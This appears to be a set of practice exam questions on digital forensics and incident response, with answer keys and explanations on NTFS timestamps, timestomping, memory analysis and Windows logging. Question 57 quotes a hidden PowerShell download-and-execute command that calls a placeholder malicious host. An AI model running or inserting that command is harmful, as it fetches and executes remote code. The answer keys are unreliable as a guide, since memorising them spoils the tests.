When investigating a suspected data exfiltration incident, which TWO sources are most useful for determining the volume and destination of the transferred data?

Select 2 answers
A.Application performance monitoring (APM) logs.
B.Network flow (NetFlow) logs.
C.Endpoint antivirus event logs.
D.Firewall connection logs.
E.Active Directory authentication logs.
AnswersB, D

NetFlow provides a detailed record of network traffic, including source and destination IP addresses, ports, and, most importantly, the byte count for each flow. This makes it an ideal source for calculating the exact volume of data exfiltrated and identifying where that traffic was directed across the network boundary.

Why this answer

Firewall logs and NetFlow data are the most reliable sources for quantifying data exfiltration. Firewall logs provide information about the connections made, while NetFlow provides the volume of data transferred between specific source and destination IPs. By analyzing these, an analyst can pinpoint the exact amount of data that left the network and where it was sent, which is crucial for reporting the incident's impact and determining the nature of the breached data.

Exam trap

Candidates often select host-based logs like file access or process execution logs, which track local activity but fail to provide the external destination IP and total bytes transferred.

31
MCQmedium

A forensic analyst is reviewing a Windows 10 workstation suspected of unauthorized data staging. While parsing the Master File Table with a commercial forensic suite, the analyst observes that a suspicious .zip file's $STANDARD_INFORMATION timestamps differ from its $FILE_NAME timestamps by more than six months, and the $FILE_NAME timestamps are older. Which conclusion is most consistent with this artifact pattern?

A.The file was created on a different NTFS volume and later copied onto this workstation using a tool that preserves $FILE_NAME timestamps.
B.The file was accessed by a backup application that updates only $STANDARD_INFORMATION timestamps during incremental backups.
C.The $STANDARD_INFORMATION timestamps were likely altered by a timestomping utility, while the $FILE_NAME timestamps retained the original values.
D.The file system is corrupt and the $FILE_NAME attribute should be treated as unreliable, so only the $STANDARD_INFORMATION timestamps should be used for the timeline.
AnswerC

Timestomping tools such as SetMace or PowerShell's Set-ItemProperty modify $STANDARD_INFORMATION because it is easily writable through the Windows API, but they frequently fail to update $FILE_NAME timestamps, which are only set during file creation or renaming. A large discrepancy where $FILE_NAME is older is a classic indicator of anti-forensic timestamp manipulation on NTFS.

Why this answer

NTFS stores two independent timestamp sets per file: $STANDARD_INFORMATION, writable through normal APIs, and $FILE_NAME, set at creation and rename. Anti-forensic tools commonly change only the former, producing a divergence where $FILE_NAME timestamps are older. This pattern is a reliable indicator of timestomping and should prompt deeper timeline analysis.

Exam trap

The trap here is assuming that matching timestamps confirm authenticity or that any mismatch indicates corruption, when in fact a systematic mismatch between attribute sets is the recognized timestomping signature.

32
MCQmedium

Which NTFS metadata attribute is responsible for storing Security Descriptors (ACLs)?

A.$FILE_NAME
B.$SECURITY_DESCRIPTOR
C.$ATTRIBUTE_LIST
D.$DATA
AnswerB

The $SECURITY_DESCRIPTOR attribute is specifically dedicated to storing the ACLs for a file. It defines the owner, the group, and the permissions granted to various users, which is essential for understanding the access control landscape of the system during a forensic investigation into unauthorized activity.

Why this answer

The $SECURITY_DESCRIPTOR attribute contains the Access Control List (ACL) information for a file, which determines which users or groups can access it. Forensic analysts frequently examine this to identify if permissions have been modified to allow unauthorized access or if a sensitive file has had its permissions altered to hide it from standard administrative users on the system.

Exam trap

Candidates often guess standard data attributes like $DATA or file name attributes instead of looking specifically for security and access control structures.

33
MCQhard

An investigator is analyzing an NTFS volume from a Windows Server 2016 system that was recently compromised. The attacker used a tool to modify file timestamps to evade detection. The investigator notices that the $STANDARD_INFORMATION timestamps for a suspicious executable are all set to 2018-01-01, while the $FILE_NAME timestamps remain at 2021-06-15. The $MFT entry number is 12345. What is the most accurate conclusion regarding the timestamp manipulation?

A.Both sets of timestamps were modified, and the investigator cannot determine which one is original without additional artifacts.
B.The $FILE_NAME timestamps were modified by the attacker, and the $STANDARD_INFORMATION timestamps are the original ones.
C.The timestamps are consistent with normal system behavior, and no manipulation occurred.
D.The attacker used a tool that only modifies $STANDARD_INFORMATION timestamps, and the $FILE_NAME timestamps are likely original and reliable.
AnswerD

This is correct because many timestamp manipulation tools, such as timestomp, target only the $STANDARD_INFORMATION attribute by default. The $FILE_NAME attribute timestamps are stored in the directory entry and are not always updated by such tools unless they specifically target them. Therefore, the discrepancy between the two sets of timestamps strongly suggests that the $STANDARD_INFORMATION values were altered, while the $FILE_NAME values may still reflect the original file creation or modification times. The investigator should prioritize the $FILE_NAME timestamps as more reliable in this scenario.

Why this answer

The correct answer is the option stating that the attacker modified only $STANDARD_INFORMATION timestamps. Common timestomping tools like timestomp or SetMace often alter the $STANDARD_INFORMATION attribute without updating the $FILE_NAME attribute. This creates a discrepancy where $STANDARD_INFORMATION shows an earlier, uniform date while $FILE_NAME retains the original timestamp.

Investigators should compare both sets of timestamps and treat the $FILE_NAME values as more reliable when manipulation is suspected, as they are harder to modify without specialized tools.

Exam trap

The trap here is assuming that any timestamp manipulation affects both $STANDARD_INFORMATION and $FILE_NAME equally, when in fact many tools only modify the $STANDARD_INFORMATION attribute.

34
MCQmedium

An incident responder acquires a memory image from a Windows Server 2016 system suspected of being compromised. The responder wants to identify network connections that were active at the time of capture, including the associated process names and ports. Which Volatility 3 plugin should the responder use to list active network connections from the memory image?

A.windows.sockets
B.windows.netstat
C.windows.connections
D.windows.netscan
AnswerD

windows.netscan scans for network connection structures in memory, including TCP and UDP endpoints, and associates them with process IDs. It can reveal active and recently closed connections, making it ideal for identifying network activity from a memory image. This directly fulfills the requirement to list active network connections with process context.

Why this answer

In Volatility 3, the windows.netscan plugin is designed to scan memory for network connection structures, providing details such as local and remote addresses, ports, and owning process IDs. It works by pool tag scanning, which can uncover connections even if they are not in the active list. The other options are either Volatility 2 plugins or non-existent, making windows.netscan the correct choice.

Exam trap

The trap here is assuming that Volatility 2 plugin names like windows.netstat carry over to Volatility 3, when in fact Volatility 3 uses different plugin names and architectures.

35
MCQhard

An investigator is analyzing a Windows 10 system where an attacker allegedly used a PowerShell script to download and execute a malicious payload. The investigator wants to determine the exact PowerShell commands that were executed. Which Windows artifact should the investigator examine to find this information?

A.Windows Security Event Log
B.ConsoleHost_history.txt file
C.Prefetch files for PowerShell.exe
D.PowerShell Operational Event Log
AnswerD

The PowerShell Operational log (Microsoft-Windows-PowerShell/Operational) records detailed information about PowerShell execution, including script block logging (Event ID 4104) and engine state changes. If script block logging is enabled, the actual commands executed are captured, making this the correct artifact for determining the exact PowerShell commands used.

Why this answer

PowerShell Operational logging, when script block logging is enabled, captures the full content of scripts and commands executed, including those run by attackers. This makes it the most reliable artifact for reconstructing the exact PowerShell activity. Other artifacts like Prefetch or Security logs may show that PowerShell ran but not what it executed.

Exam trap

The trap here is assuming that any log showing PowerShell execution will contain the command details, when in fact only the PowerShell Operational log with script block logging enabled provides that level of detail.

36
MCQmedium

An analyst is examining a file that was deleted. Why is the 'File Name' (FN) attribute in the MFT still potentially readable?

A.The MFT entry is locked by the OS kernel.
B.NTFS does not zero out MFT records upon deletion.
C.The file was stored on a compressed volume.
D.The entry is hard-linked to another file.
AnswerB

NTFS optimizes performance by simply marking MFT entries as available during deletion rather than zeroing out the data. This leaves the previous contents, including the FN attribute, intact in the record until a subsequent file creation operation overwrites it with new metadata, which is a core concept in forensic recovery.

Why this answer

When a file is deleted in NTFS, the MFT record is marked as free, but the data within the record is not immediately wiped or zeroed. The FN attribute remains in the MFT entry until the record is reallocated to a new file. This is a critical forensic detail because it allows analysts to recover metadata from deleted files, often providing the only remaining evidence of a file's existence after the data clusters have been overwritten.

Exam trap

Many candidates incorrectly believe that deleting a file immediately wipes the MFT record, leading them to assume that metadata for deleted files is irretrievable from the MFT itself.

37
MCQmedium

During an investigation of a compromised Windows 10 workstation, a forensic analyst reviews the NTFS $MFT and observes that the Standard Information Attribute (SIA) timestamps for a suspicious executable in C:\Windows\Temp are all identical, while the File Name Attribute (FNA) timestamps show a different, earlier date. The executable has no corresponding Prefetch file. Which conclusion is most strongly supported by these artifacts?

A.The file was created by a legitimate installer that preserved original timestamps, and the lack of Prefetch is due to a disabled SysMain service.
B.The file is encrypted by EFS, which alters $STANDARD_INFORMATION timestamps and prevents Prefetch creation until the file is decrypted.
C.The file is a legitimate Windows component that was moved from another volume, causing the SIA and FNA timestamps to diverge and Prefetch to be absent.
D.The file was likely placed by a tool that manipulated $STANDARD_INFORMATION timestamps to hinder timeline analysis, and it may not have been executed on this system.
AnswerD

Identical SIA timestamps combined with different FNA timestamps are a classic sign of timestomping, where an attacker sets $STANDARD_INFORMATION to a false date. The earlier FNA timestamps reflect when the file name was actually created. The absence of a Prefetch file further suggests the executable may not have run, or Prefetch was cleared, so the analyst cannot assume execution from these artifacts alone.

Why this answer

Identical $STANDARD_INFORMATION timestamps paired with differing $FILE_NAME timestamps indicate timestomping, because the SIA can be modified by user-mode APIs while the FNA is updated only by the kernel during file creation or rename. The absence of a Prefetch file means the analyst cannot confirm execution from these artifacts alone, and the file's location in C:\Windows\Temp further supports a malicious or suspicious origin rather than normal installation.

Exam trap

The trap here is assuming that identical SIA timestamps prove the file was executed, when they actually suggest timestamp manipulation and the lack of Prefetch means execution is unconfirmed.

38
MCQmedium

Refer to the exhibit. An investigator observes the listed network connections on a compromised server. Which process warrants immediate investigation based on these connections?

A.The process with PID 4.
B.The process with PID 4820.
C.The connection to 10.10.1.5.
D.The SMB connection on port 445.
AnswerB

PID 4820 is initiating an outbound connection to 203.0.113.45 on port 443. This behavior is characteristic of command-and-control (C2) traffic, where a compromised host reaches out to an external server. Investigating this process is the most logical step to identify the malicious payload and determine the extent of the compromise.

Why this answer

The exhibit shows two active connections. The first is a standard SMB connection, but the second, PID 4820, connects to an external IP on port 443. This is highly suspicious for a server that should not have direct outbound HTTPS communication to an unknown external host.

Identifying the process associated with PID 4820 allows the analyst to trace the activity back to the binary responsible for the unauthorized external communication, which is a key indicator of C2 traffic.

Exam trap

Candidates often struggle to identify the correct PID when multiple connections are listed. They fail to distinguish between standard internal traffic and anomalous external traffic, choosing the wrong process for investigation.

39
MCQmedium

What does a non-resident $DATA attribute indicate in an NTFS MFT record?

A.The file is too small to be resident.
B.The file data is stored in separate clusters.
C.The file is corrupted.
D.The file is permanently deleted.
AnswerB

A non-resident attribute means the data is located outside the MFT record in physical data clusters. The attribute header contains 'data runs' that describe the starting cluster and the number of clusters occupied, which are essential for manual file carving and data reconstruction.

Why this answer

A non-resident $DATA attribute indicates that the actual file content is stored in external data clusters on the disk, rather than inside the MFT record. This is the standard behavior for most files. Analysts must understand this to correctly use data runs, which are pointers found within the $DATA attribute that tell the OS exactly where to find the file's fragmented pieces on the physical media.

Exam trap

Candidates frequently confuse non-resident attributes with deleted files, assuming that non-resident status implies data loss or file corruption rather than standard storage in external clusters.

40
MCQmedium

During an investigation of a Windows Server 2019 host, you review the Security event log and find Event ID 4624 entries with Logon Type 3 originating from a workstation subnet that should never authenticate to this server. The associated 4672 entry shows SeDebugPrivilege assigned to the resulting token. The account name is a normal helpdesk user. Which conclusion is most defensible from these artifacts alone?

A.The server was rebooted and the helpdesk account was used as a service account during startup.
B.The helpdesk account authenticated over the network and received administrator-level privileges in that session.
C.The helpdesk account performed an interactive RDP session to the server from the workstation subnet.
D.The account was used to start a scheduled task on the server, which explains the privileged token.
AnswerB

Logon Type 3 confirms a network authentication (SMB, WMI, or similar), and Event 4672 is logged when a logon is assigned special privileges, here SeDebugPrivilege. The combination of an unexpected source subnet, a non-admin account name, and administrator-equivalent privileges indicates the account is being used with elevated rights from an unauthorized location, which warrants pivoting to the source host for further evidence.

Why this answer

A Logon Type 3 combined with Event 4672 indicates a network authentication that received special privileges, which is the classic signature of remote administrative access using a nominally low-privilege account. The unauthorized source subnet makes this more suspicious rather than less. Investigators should follow the source IP back to the originating host and check for credential theft or lateral movement tooling there.

Exam trap

The trap here is assuming any 4672 event means the account is an administrator, when 4672 only shows privileges were assigned to the logon token, and the logon type still governs how the session began.

41
MCQeasy

When reviewing firewall logs, what activity should be flagged as an immediate indicator of a potential port scan?

A.Multiple successful inbound connections to port 80.
B.A high frequency of connection attempts from one source to many destination ports.
C.A single connection to a database port from an internal host.
D.Periodic outbound traffic to a known DNS server.
AnswerB

Systematic probes across a large range of ports from a single source are the primary indicator of a port scan. Security analysts use this pattern to identify reconnaissance efforts, allowing them to block the offending IP address before the attacker can identify and exploit vulnerable services on the network.

Why this answer

A port scan involves a single source IP attempting to connect to a large range of destination ports in a short timeframe. Firewall logs showing a spike in 'Denied' or 'Dropped' connection attempts from one host to many different targets is a classic signature. Identifying this helps analysts catch reconnaissance activity early before the attacker transitions to active exploitation of a specific vulnerable service.

Exam trap

Test-takers sometimes mistake high-volume traffic to a single destination port for a port scan, missing the core definition of scanning multiple ports.

42
MCQmedium

During an intrusion investigation on a Windows 10 workstation, an analyst observes that several user-mode processes have established TCP connections to 203.0.113.45:443. The analyst wants to determine which executable image on disk was responsible for the network activity and whether the process is still running. Which artifact provides the most direct evidence by mapping a live network connection to its owning process executable path?

A.Security event log 5156 (Windows Filtering Platform permitted a connection) filtered by destination IP
B.Sysmon Event ID 3 (Network connection detected) with the Image and DestinationIp fields
C.Windows Firewall log entries recording allowed outbound connections to the remote IP
D.Netstat output showing the PID and remote address, correlated with Task Manager
AnswerB

Sysmon Event ID 3 records network connection events and includes the Image field (full path of the process executable) along with source/destination IP and port. This directly answers which executable initiated the connection to 203.0.113.45:443. If configured with adequate filtering, it captures this even when the process is short-lived, making it the most direct artifact for correlating a connection with an on-disk executable.

Why this answer

Sysmon Event ID 3 is specifically designed to log network connection events and includes the full image path of the process that initiated the connection, along with source and destination IP/port. This allows an analyst to definitively map a connection to an executable on disk and determine if that process was running at the time of the event. Other artifacts either lack process attribution, are non-persistent, or do not record the executable path in a usable form for this correlation.

Exam trap

The trap here is assuming that any log showing a connection to the suspicious IP automatically identifies the responsible executable, when in fact only artifacts that include the process image path provide that attribution.

43
MCQmedium

An investigator is examining a Windows 10 workstation's NTFS volume with Sleuth Kit tools. They run fls against the volume and observe that a deleted file's MFT entry still shows a valid $FILE_NAME attribute referencing the parent directory, but the $DATA attribute's resident content is now zero-filled. Which interpretation of this artifact is MOST accurate for the timeline?

A.The file was deleted, and the resident data stream was zeroed during deletion or by subsequent system activity while the MFT entry itself was not yet reused.
B.The file is a sparse file whose allocated ranges were trimmed by the NTFS compression engine, leaving a valid $FILE_NAME with empty content.
C.The file was moved to a different directory, causing NTFS to clear the $DATA attribute and retain the $FILE_NAME attribute as a tombstone.
D.The MFT record was reallocated to a new file, which overwrote only the $DATA attribute while preserving the $FILE_NAME attribute.
AnswerA

When a file is deleted on NTFS, the MFT record is marked inactive but the entry can persist until reused. Resident $DATA content may be zeroed by the deletion process or later activity, while $FILE_NAME metadata survives in the record. This supports establishing a deletion event in the timeline even though the file content is unrecoverable from the resident stream.

Why this answer

A deleted NTFS file often leaves its MFT record intact until reallocation, with $FILE_NAME still referencing the parent directory. Zeroed resident $DATA indicates the content was cleared during or after deletion, not that the record was reused. Analysts should treat the entry as evidence of a deletion event and avoid claiming recoverability of the data stream from this record alone.

Exam trap

The trap here is assuming a zeroed $DATA attribute always means the MFT record was reallocated, when an inactive record with preserved $FILE_NAME commonly indicates deletion without reuse.

44
MCQeasy

Which NTFS attribute would an investigator primarily examine to determine the parent directory of a specific file?

A.$STANDARD_INFORMATION
B.$FILE_NAME
C.$DATA
D.$INDEX_ROOT
AnswerB

$FILE_NAME stores the name of the file and, crucially, the reference ID of its parent directory. This allows the OS to construct the file path and navigate the directory tree. Analysts use this to verify the file's location and identify potential discrepancies with the user-provided path.

Why this answer

The $FILE_NAME attribute contains the parent directory ID, which is a reference to the directory's record in the MFT. This attribute is essential for building a full path for a file. Because it is maintained by the system kernel, it is also highly reliable for verification against the user-visible paths provided by the $SI attribute, aiding in identifying path-based manipulation.

Exam trap

Test-takers often incorrectly choose the $INDEX_ROOT or $STANDARD_INFORMATION attribute when asked to find the parent directory reference for a specific file.

45
MCQmedium

When examining a memory image, why is it necessary to ensure that the profile used for the memory analysis tool matches the target operating system's specific build?

A.To ensure the memory image is encrypted correctly
B.To determine the correct offsets for kernel data structures
C.To increase the speed of the memory dumping process
D.To bypass the system's kernel-mode security drivers
AnswerB

Kernel structures are highly dependent on the specific OS version and kernel build. The profile tells the forensic tool the exact location and size of these structures, such as process lists and thread blocks, ensuring that the tool parses the memory image accurately without data misalignment errors.

Why this answer

Kernel data structures, such as the EPROCESS list or the KPCR, change in offset and size between different OS builds and service packs. If an incorrect profile is used, the analysis tool will misinterpret these structures, leading to incorrect process listing, failed memory mapping, or complete analysis failure. Using the correct profile ensures that the tool accurately maps the memory layout according to the specific kernel offsets of the target system.

Exam trap

Candidates often think the memory image itself contains all necessary structures. However, without the correct profile, the analysis tool cannot correctly interpret the kernel's memory layout and data offsets.

46
MCQmedium

An attacker is using a living-off-the-land (LotL) technique to execute commands on a Linux server. Which log source is most likely to reveal the command-line arguments used?

A.Syslog (/var/log/syslog).
B.Linux Audit Framework (auditd).
C.Apache Access Logs.
D.X11 Display Logs.
AnswerB

The Linux Audit Framework is designed to record system calls, including the 'execve' system call. This allows it to capture the exact command-line arguments passed to any binary, providing a detailed record of what an attacker did. This level of detail is essential for identifying LotL activity on Linux hosts.

Why this answer

Linux auditd is the most robust tool for capturing process execution details. By configuring auditd to watch the 'execve' system call, responders can log every command executed, including its arguments, by every user on the system. This is invaluable during an incident because LotL techniques often use standard, trusted binaries to perform malicious acts, and command-line arguments are the only evidence distinguishing legitimate administrative use from an attacker's malicious actions.

Exam trap

Candidates frequently select Bash history, forgetting it is easily cleared or disabled by attackers. Auditd is the system-level standard that captures execution regardless of user-space shell configuration.

47
Multi-Selectmedium

Which TWO of the following behaviors are common indicators of fileless malware execution that a forensic analyst should look for in memory artifacts?

Select 2 answers
A.Creation of an autorun registry key pointing to a hidden .exe file.
B.Evidence of PowerShell execution using the -EncodedCommand flag.
C.Injected code found within the memory space of a legitimate process.
D.Large volume of deleted files recovered from the $MFT.
E.High frequency of DLL load events from the C:\Windows\Temp directory.
AnswersB, C

Using -EncodedCommand is a classic tactic to hide malicious PowerShell logic from simple string-based logging. Forensic analysts frequently encounter this in fileless attacks, where the script is base64-encoded and passed directly into memory, leaving no direct trace of the script file on the local file system.

Why this answer

Fileless malware operates by residing in volatile memory rather than writing traditional binaries to the disk. Analysts must focus on process memory injection, anomalous script execution, and reflective DLL loading. Detecting these requires memory forensics tools to extract and analyze injected code segments or PowerShell command history.

This is critical because attackers increasingly use living-off-the-land techniques to evade signature-based antivirus solutions that primarily scan files on disk.

Exam trap

Students often look for traditional executable files on the disk, failing to select memory-based indicators like encoded PowerShell commands and injected process code.

48
MCQhard

In the context of memory forensics, what does the term 'Page File' represent in a crash dump?

A.A reserved section of the CPU cache.
B.A file that stores inactive virtual memory.
C.A list of all allocated kernel drivers.
D.A log of all system process launches.
AnswerB

The page file acts as backing store for virtual memory pages that are not currently resident in physical RAM. Forensic analysis often requires examining the page file to recover data that was swapped out, which is common for inactive or long-running processes that hold evidence of malicious activity.

Why this answer

The page file is a disk-based extension of physical RAM. When a system performs a dump, it may contain data swapped from physical memory to the page file. Forensic analysts must understand this because critical evidence—such as decrypted payloads or old process data—might exist in the page file rather than the active physical RAM, requiring the analyst to reconstruct the virtual address space using both sources.

Exam trap

Candidates often confuse the page file with active physical RAM or volatile registry hives, missing its role as disk-based virtual memory storage.

49
MCQmedium

When performing timeline analysis on a Linux system, which file is the most critical to examine to reconstruct user login and logout history?

A./var/log/syslog
B./var/run/utmp
C./var/log/wtmp
D./etc/passwd
AnswerC

The wtmp file is a binary log that records every login and logout event on the system. It is specifically designed for long-term audit purposes, making it the primary source for establishing a timeline of user access. Its binary nature ensures that it is not easily modified by standard users.

Why this answer

The wtmp file is the standard repository for historical login and logout data on Linux systems. By tracking session durations and connection origins, investigators can establish a user's presence during the time of an incident. This file is essential for building a reliable user-activity timeline, which provides the context needed to link specific file system changes to a particular user account or remote connection.

Exam trap

Test-takers frequently confuse authentication logs like auth.log with wtmp, missing that wtmp specifically serves as the binary repository for historical session durations and logins.

50
MCQmedium

During a compromise investigation, an analyst reviews Windows Event Logs and observes that Security Event ID 4688 entries are present, but the Process Command Line field is empty for all of them. The system is running Windows 10 Enterprise. What is the most likely reason for the missing command line data?

A.The Security log has wrapped, and older entries containing command lines were overwritten before collection.
B.The 'Include command line in process creation events' policy under Administrative Templates\System\Audit Process Creation is not enabled.
C.The Windows Event Log service is configured to filter out command-line data for privacy reasons via a built-in security template.
D.Process creation auditing is not enabled at all, so Event ID 4688 should not appear.
AnswerB

This policy, when enabled, adds the full command line to the Process Creation event. Without it, Windows records the new process ID and image name but leaves the command line field blank. Enabling it requires a Group Policy update or registry change and is not on by default even when process creation auditing is active.

Why this answer

The correct answer is the policy that controls command-line inclusion in process creation events. When enabled, it populates the Process Command Line field in Event ID 4688. Without it, the field remains empty.

This is a common pitfall because process creation auditing alone does not guarantee command-line visibility; the separate policy must be turned on.

Exam trap

The trap here is assuming that enabling process creation auditing automatically records command lines, when a separate policy must also be enabled.

51
MCQhard

A forensic analyst is analyzing a Windows 10 memory image and finds a process named 'svchost.exe' with PID 4567. The process's parent is 'services.exe', but its executable path is C:\Users\Public\svchost.exe. The analyst also notices that the process has a network connection to an external IP on port 443. Which of the following is the most likely explanation for this finding?

A.The process is a legitimate svchost.exe that has been compromised via DLL hijacking, causing it to load a malicious DLL from the user directory.
B.The process is a legitimate svchost.exe that has been migrated to a user directory by Windows Update as part of a rollback operation.
C.The process is a malicious executable masquerading as svchost.exe, using a legitimate parent process name and an external network connection for command and control.
D.The process is a legitimate svchost.exe instance that has been moved to a user directory by a system administrator for troubleshooting.
AnswerC

Malware often names itself svchost.exe and places itself in user-writable directories like C:\Users\Public to appear legitimate. The parent being services.exe is likely spoofed or the malware was injected into a legitimate svchost process. The external connection on port 443 suggests command and control. This is a classic masquerading technique.

Why this answer

A process named svchost.exe running from C:\Users\Public with a parent of services.exe and an external network connection is a classic sign of malware masquerading as a legitimate system process. The executable path is the key indicator, as legitimate svchost.exe runs from System32. The external connection suggests command and control.

Exam trap

The trap here is trusting the process name and parent process, which can be spoofed, instead of verifying the executable path and network behavior, which are more reliable indicators of malicious activity.

52
MCQmedium

During a live response on a Windows 10 workstation, you observe a process named 'lsass.exe' with PID 672. Its parent process is 'winlogon.exe' (PID 596), and its executable path is 'C:\Windows\System32\lsass.exe'. However, the process has an open handle to a suspicious named pipe '\\.\pipe\evil'. Based on this evidence, what is the most likely explanation?

A.The named pipe is a standard Windows component used for local security authority communication and is not suspicious.
B.The process is a legitimate lsass.exe that has been compromised via a DLL injection or reflective loading technique.
C.The process is a masquerading executable placed in the System32 directory by an attacker.
D.The process is a child of winlogon.exe, which indicates it is a normal system process and the pipe handle is irrelevant.
AnswerB

A legitimate lsass.exe should not have handles to arbitrary named pipes unless they are part of normal system operation. The presence of an unusual named pipe like 'evil' suggests code injection or a malicious module loaded into the process, allowing an attacker to communicate with it. This is consistent with credential dumping or persistence mechanisms.

Why this answer

The correct answer identifies that a legitimate lsass.exe with an unusual named pipe handle suggests compromise through injection or reflective loading. The process path and parent are normal, so the anomaly is the pipe, which is not part of standard lsass behavior. This indicates malicious code running within a trusted process.

Exam trap

The trap here is assuming that because the process path and parent are correct, the process is entirely benign, ignoring the suspicious named pipe handle.

53
MCQmedium

During a live response on a Windows 10 workstation suspected of lateral movement, you capture volatile memory and also export the Windows Event Logs. You need to correlate a process that was running at the time of capture with its parent process and the user account that launched it, using only the memory image. Which Volatility 3 plugin should you run to produce a parent-child process tree with PID/PPID, image name, and offset columns?

A.windows.getsids
B.windows.pstree
C.windows.pslist
D.windows.psscan
AnswerB

windows.pstree walks the ActiveProcessLinks list and prints each process with its PID, PPID, image name, and offset, rendering an indented tree. This directly exposes parent-child relationships at capture time, letting you tie a suspicious child to the process that spawned it and, by cross-referencing windows.getsids or windows.cmdline, to the launching user context.

Why this answer

The goal is a parent-child process tree with PID, PPID, and image name from a memory image. The pstree plugin is purpose-built for that: it traverses the active process list and renders indentation that shows lineage. Other plugins either list processes flatly, hunt for hidden or terminated objects, or resolve SIDs, none of which produce the tree structure required here.

Exam trap

The trap here is assuming any process-listing plugin shows lineage; pslist shows PPID as a column but does not construct the parent-child tree that pstree does.

54
MCQeasy

A forensic analyst is examining a Linux ext4 file system and wants to determine when a file's metadata (such as permissions or ownership) was last changed. Which timestamp should they examine?

A.ctime
B.atime
C.btime
D.mtime
AnswerA

ctime (change time) is updated whenever the file's metadata changes, including permissions, ownership, or when the file is renamed. It is not the creation time. In this scenario, the analyst needs the time of metadata change, so ctime is the correct timestamp. It is stored in the inode and is crucial for tracking administrative changes.

Why this answer

On Linux ext4, ctime is updated when file metadata changes, such as permissions or ownership. mtime reflects content changes, atime reflects access, and btime is creation time. Therefore, ctime is the correct timestamp to determine when metadata was last altered.

Exam trap

The trap here is confusing ctime with creation time; ctime stands for change time, not creation time, and is updated on metadata changes.

55
MCQmedium

Why is it important to include non-security personnel, such as legal counsel and HR, in the incident response process for a significant data breach?

A.They provide technical expertise needed to reverse engineer the malware.
B.They provide necessary oversight to ensure the company remains compliant with regulations.
C.They are required to manually approve all firewall changes in the network.
D.They are responsible for conducting the forensic investigation of the servers.
AnswerB

Data breaches trigger strict regulatory obligations, such as GDPR or HIPAA notifications. Legal counsel is essential to navigate these requirements, ensuring that the company fulfills its disclosure duties correctly and in a timely manner. HR is necessary if employee discipline or internal policy enforcement becomes a component of the response.

Why this answer

Large-scale data breaches have profound legal and regulatory implications that go far beyond technical remediation. Legal counsel ensures the organization meets mandatory disclosure timelines and manages liability, while HR manages the human element, especially if the breach involved insider threats or required employee-related actions. Their involvement ensures the organization stays compliant with the law and minimizes organizational risk, which is just as vital as the technical work of stopping the attacker.

Exam trap

Candidates incorrectly assume breach response is purely technical, neglecting the mandatory legal compliance, regulatory notification timelines, and HR oversight required during major incidents.

56
MCQhard

An incident responder is investigating a compromised Windows system and finds that the attacker used a technique known as 'process hollowing' to hide malicious code. Which of the following best describes how process hollowing works?

A.The attacker injects malicious code into a running process by using remote thread creation, without replacing the entire process image.
B.The attacker exploits a vulnerability in a legitimate process to execute arbitrary code within its context, without modifying its memory.
C.The attacker creates a new process in a suspended state, replaces its memory with malicious code, and then resumes the process.
D.The attacker uses a scheduled task to execute a malicious script that masquerades as a legitimate system process.
AnswerC

Process hollowing involves creating a legitimate process in a suspended state, unmapping its memory, writing malicious code into the address space, and then resuming the process. This makes the malicious code appear to run under a legitimate process name, evading detection. The responder should look for discrepancies between the process's image on disk and its in-memory content, often using memory forensics tools like Volatility.

Why this answer

Process hollowing is a technique where an attacker creates a legitimate process in a suspended state, replaces its memory with malicious code, and then resumes it. This allows the malicious code to run under the guise of a trusted process, making it harder to detect. Memory forensics can reveal inconsistencies between the on-disk executable and the in-memory image.

Exam trap

The trap here is confusing process hollowing with other code injection techniques like remote thread injection or DLL injection, which do not involve replacing the entire process image.

57
MCQhard

An incident responder is analyzing a compromised Windows server and suspects that an attacker used a scheduled task to maintain persistence. The responder runs 'schtasks /query /fo LIST /v' and sees a task named 'Updater' with a trigger set to run every hour. The task's action is 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/script.ps1')"'. Which of the following best describes the attacker's technique?

A.The attacker is using a scheduled task to run a PowerShell script that is already stored locally on the server, which indicates a previous compromise.
B.The attacker is using a scheduled task to run a PowerShell script that is signed by a trusted publisher, which bypasses application whitelisting.
C.The attacker is using a scheduled task to execute a PowerShell script that is embedded in the task's action, which is a form of obfuscation.
D.The attacker is using a scheduled task to download and execute a PowerShell script from a remote server, which is a form of fileless malware and persistence.
AnswerD

This option correctly identifies the technique: a scheduled task that runs a hidden PowerShell command to download and execute a remote script. This is fileless because the payload is not written to disk, and it provides persistence by running hourly. The use of 'IEX' (Invoke-Expression) and Net.WebClient is a common pattern for fileless attacks. The responder should investigate the remote server and check for other persistence mechanisms.

Why this answer

The scheduled task runs a hidden PowerShell command that downloads and executes a remote script using Invoke-Expression. This is a fileless persistence technique because the payload is not written to disk and the task ensures recurring execution. The responder should treat this as a serious compromise, investigate the remote URL, and check for similar tasks on other systems.

Exam trap

The trap here is assuming that the PowerShell script is stored locally or embedded in the task, when it is actually downloaded from a remote server.

58
MCQhard

An enterprise incident responder is analyzing a compromised Windows 10 workstation. The attacker used a scheduled task to maintain persistence. The responder runs 'schtasks /query /fo LIST /v' and sees a task named 'Updater' with the action 'C:\Windows\Temp\svchost.exe'. However, the file svchost.exe is not present in that directory. Which of the following best explains why the task still appears and what should the responder do next?

A.The task is likely a legitimate Windows component; svchost.exe in Temp is normal. The responder should ignore it.
B.The task is a ghost entry; it will be removed after a reboot. No further action is needed.
C.The task was created by a Group Policy Object (GPO); it will be recreated on next policy refresh. The responder should check GPOs.
D.The file may have been deleted by the attacker or antivirus; the task definition remains in the registry and should be examined and removed if malicious.
AnswerD

Scheduled tasks are defined in the registry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache and also have corresponding files in System32\Tasks. Even if the executable is missing, the task definition persists. The attacker might have deleted the file to evade detection, or antivirus may have quarantined it. The responder should examine the task's XML definition, check for related registry keys, and remove the task if it is malicious to eliminate persistence.

Why this answer

Scheduled tasks persist in the registry and on disk even if the referenced executable is missing. The attacker may have deleted the executable to hinder analysis, but the task definition remains and can be used to re-establish persistence if the file is restored. The responder must examine the task's XML, registry entries, and creation time, then remove it if malicious.

This ensures the persistence mechanism is fully eradicated.

Exam trap

The trap here is assuming that a scheduled task with a missing executable is automatically harmless or will self-remove.

59
MCQhard

An analyst is reviewing an NTFS file system timeline and notices that a file's $STANDARD_INFORMATION modified timestamp is 2024-01-15 10:00:00, while its $FILE_NAME modified timestamp is 2024-01-15 09:55:00. The file's $MFT record shows a USN journal entry indicating a rename operation at 09:54:00. There is no other metadata. Which of the following is the most likely explanation for the 5-minute difference between the two modified timestamps?

A.The file system was mounted with the noatime option, causing the $FILE_NAME timestamp to lag behind the $STANDARD_INFORMATION timestamp.
